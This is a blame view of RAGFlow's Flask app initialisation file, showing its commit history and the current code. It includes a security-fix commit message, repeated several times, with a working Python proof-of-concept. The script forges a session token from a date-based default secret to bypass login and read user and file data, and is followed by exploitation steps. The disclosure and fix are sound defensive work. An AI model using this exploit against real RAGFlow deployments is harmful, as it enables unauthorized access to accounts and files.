OpenSource
/
ragflow
Watch 4
Star 0
Fork 0
Code Issues 0 Pull Requests 0 Releases 33 Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
3738 Commits
7 Branches
Tree: e6cb74b27f
Branches Tags
${ item.name }
Create branch ${ searchTerm }
from 'e6cb74b27f'
${ noResults }
ragflow/api/apps/__init__.py

__init__.py 5.4KB
Raw Normal View History

Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Use consistent log file names, introduced initLogger (#3403) ### What problem does this PR solve? Use consistent log file names, introduced initLogger ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [x] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):
11 months ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Remove unused code (#3448) ### What problem does this PR solve? 1. Remove unused code. 2. Move some codes from settings to constants ### Type of change - [x] Refactoring --------- Signed-off-by: jinhai <haijin.chn@gmail.com>
11 months ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Feat: add SMTP support for user invitation emails (#9479) ### What problem does this PR solve? Add SMTP support for user invitation emails ### Type of change - [x] New Feature (non-breaking change which adds functionality)
2 months ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 months ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Remove unused code (#3448) ### What problem does this PR solve? 1. Remove unused code. 2. Move some codes from settings to constants ### Type of change - [x] Refactoring --------- Signed-off-by: jinhai <haijin.chn@gmail.com>
11 months ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Feat: add SMTP support for user invitation emails (#9479) ### What problem does this PR solve? Add SMTP support for user invitation emails ### Type of change - [x] New Feature (non-breaking change which adds functionality)
2 months ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Refa: enlarge default max request body size. (#6088) ### What problem does this PR solve? ### Type of change - [x] Refactoring
7 months ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data (#7325) ### What problem does this PR solve? Fix:When you create a new API module named xxxa_api, the access route will become xxx instead of xxxa. For example, when I create a new API module named 'data_api', the access route will become 'dat' instead of 'data' Fix:Fixed the issue where the new knowledge base would not be renamed when there was a knowledge base with the same name ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: tangyu <1@1.com> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
5 months ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 months ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Fix: Starting the source code on Windows, the 'HTTP API' returns 404 (#5042) Fix: When starting the backend service from source code on Windows, the "HTTP API" no longer returns 404.
8 months ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Fix: Starting the source code on Windows, the 'HTTP API' returns 404 (#5042) Fix: When starting the backend service from source code on Windows, the "HTTP API" no longer returns 404.
8 months ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Move settings initialization after module init phase (#3438) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>
11 months ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Feat: add SMTP support for user invitation emails (#9479) ### What problem does this PR solve? Add SMTP support for user invitation emails ### Type of change - [x] New Feature (non-breaking change which adds functionality)
2 months ago
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
Feat: add SMTP support for user invitation emails (#9479) ### What problem does this PR solve? Add SMTP support for user invitation emails ### Type of change - [x] New Feature (non-breaking change which adds functionality)
2 months ago
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
Feat: add SMTP support for user invitation emails (#9479) ### What problem does this PR solve? Add SMTP support for user invitation emails ### Type of change - [x] New Feature (non-breaking change which adds functionality)
2 months ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
Refactor (#4303) ### What problem does this PR solve? ### Type of change - [x] Refactoring
10 months ago
Format file format from Windows/dos to Unix (#1949) ### What problem does this PR solve? Related source file is in Windows/DOS format, they are format to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>
1 year ago
feat: docs for api endpoints to generate openapi specification (#3109) ### What problem does this PR solve? **Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API.** Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`
1 year ago
 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180 
  1. #

  2. #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.

  3. #

  4. #  Licensed under the Apache License, Version 2.0 (the "License");

  5. #  you may not use this file except in compliance with the License.

  6. #  You may obtain a copy of the License at

  7. #

  8. #      http://www.apache.org/licenses/LICENSE-2.0

  9. #

  10. #  Unless required by applicable law or agreed to in writing, software

  11. #  distributed under the License is distributed on an "AS IS" BASIS,

  12. #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.

  13. #  See the License for the specific language governing permissions and

  14. #  limitations under the License.

  15. #

  16. import os

  17. import sys

  18. import logging

  19. from importlib.util import module_from_spec, spec_from_file_location

  20. from pathlib import Path

  21. from flask import Blueprint, Flask

  22. from werkzeug.wrappers.request import Request

  23. from flask_cors import CORS

  24. from flasgger import Swagger

  25. from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer

  26. 

  27. from api.db import StatusEnum

  28. from api.db.db_models import close_connection

  29. from api.db.services import UserService

  30. from api.utils import CustomJSONEncoder, commands

  31. 

  32. from flask_mail import Mail

  33. from flask_session import Session

  34. from flask_login import LoginManager

  35. from api import settings

  36. from api.utils.api_utils import server_error_response

  37. from api.constants import API_VERSION

  38. 

  39. __all__ = ["app"]

  40. 

  41. Request.json = property(lambda self: self.get_json(force=True, silent=True))

  42. 

  43. app = Flask(__name__)

  44. smtp_mail_server = Mail()

  45. 

  46. # Add this at the beginning of your file to configure Swagger UI

  47. swagger_config = {

  48.     "headers": [],

  49.     "specs": [

  50.         {

  51.             "endpoint": "apispec",

  52.             "route": "/apispec.json",

  53.             "rule_filter": lambda rule: True,  # Include all endpoints

  54.             "model_filter": lambda tag: True,  # Include all models

  55.         }

  56.     ],

  57.     "static_url_path": "/flasgger_static",

  58.     "swagger_ui": True,

  59.     "specs_route": "/apidocs/",

  60. }

  61. 

  62. swagger = Swagger(

  63.     app,

  64.     config=swagger_config,

  65.     template={

  66.         "swagger": "2.0",

  67.         "info": {

  68.             "title": "RAGFlow API",

  69.             "description": "",

  70.             "version": "1.0.0",

  71.         },

  72.         "securityDefinitions": {

  73.             "ApiKeyAuth": {"type": "apiKey", "name": "Authorization", "in": "header"}

  74.         },

  75.     },

  76. )

  77. 

  78. CORS(app, supports_credentials=True, max_age=2592000)

  79. app.url_map.strict_slashes = False

  80. app.json_encoder = CustomJSONEncoder

  81. app.errorhandler(Exception)(server_error_response)

  82. 

  83. ## convince for dev and debug

  84. # app.config["LOGIN_DISABLED"] = True

  85. app.config["SESSION_PERMANENT"] = False

  86. app.config["SESSION_TYPE"] = "filesystem"

  87. app.config["MAX_CONTENT_LENGTH"] = int(

  88.     os.environ.get("MAX_CONTENT_LENGTH", 1024 * 1024 * 1024)

  89. )

  90. 

  91. Session(app)

  92. login_manager = LoginManager()

  93. login_manager.init_app(app)

  94. 

  95. commands.register_commands(app)

  96. 

  97. 

  98. def search_pages_path(pages_dir):

  99.     app_path_list = [

  100.         path for path in pages_dir.glob("*_app.py") if not path.name.startswith(".")

  101.     ]

  102.     api_path_list = [

  103.         path for path in pages_dir.glob("*sdk/*.py") if not path.name.startswith(".")

  104.     ]

  105.     app_path_list.extend(api_path_list)

  106.     return app_path_list

  107. 

  108. 

  109. def register_page(page_path):

  110.     path = f"{page_path}"

  111. 

  112.     page_name = page_path.stem.removesuffix("_app")

  113.     module_name = ".".join(

  114.         page_path.parts[page_path.parts.index("api"): -1] + (page_name,)

  115.     )

  116. 

  117.     spec = spec_from_file_location(module_name, page_path)

  118.     page = module_from_spec(spec)

  119.     page.app = app

  120.     page.manager = Blueprint(page_name, module_name)

  121.     sys.modules[module_name] = page

  122.     spec.loader.exec_module(page)

  123.     page_name = getattr(page, "page_name", page_name)

  124.     sdk_path = "\\sdk\\" if sys.platform.startswith("win") else "/sdk/"

  125.     url_prefix = (

  126.         f"/api/{API_VERSION}" if sdk_path in path else f"/{API_VERSION}/{page_name}"

  127.     )

  128. 

  129.     app.register_blueprint(page.manager, url_prefix=url_prefix)

  130.     return url_prefix

  131. 

  132. 

  133. pages_dir = [

  134.     Path(__file__).parent,

  135.     Path(__file__).parent.parent / "api" / "apps",

  136.     Path(__file__).parent.parent / "api" / "apps" / "sdk",

  137. ]

  138. 

  139. client_urls_prefix = [

  140.     register_page(path) for dir in pages_dir for path in search_pages_path(dir)

  141. ]

  142. 

  143. 

  144. @login_manager.request_loader

  145. def load_user(web_request):

  146.     jwt = Serializer(secret_key=settings.SECRET_KEY)

  147.     authorization = web_request.headers.get("Authorization")

  148.     if authorization:

  149.         try:

  150.             access_token = str(jwt.loads(authorization))

  151. 

  152.             if not access_token or not access_token.strip():

  153.                 logging.warning("Authentication attempt with empty access token")

  154.                 return None

  155. 

  156.             # Access tokens should be UUIDs (32 hex characters)

  157.             if len(access_token.strip()) < 32:

  158.                 logging.warning(f"Authentication attempt with invalid token format: {len(access_token)} chars")

  159.                 return None

  160. 

  161.             user = UserService.query(

  162.                 access_token=access_token, status=StatusEnum.VALID.value

  163.             )

  164.             if user:

  165.                 if not user[0].access_token or not user[0].access_token.strip():

  166.                     logging.warning(f"User {user[0].email} has empty access_token in database")

  167.                     return None

  168.                 return user[0]

  169.             else:

  170.                 return None

  171.         except Exception as e:

  172.             logging.warning(f"load_user got exception {e}")

  173.             return None

  174.     else:

  175.         return None

  176. 

  177. 

  178. @app.teardown_request

  179. def _db_close(exc):

  180.     close_connection()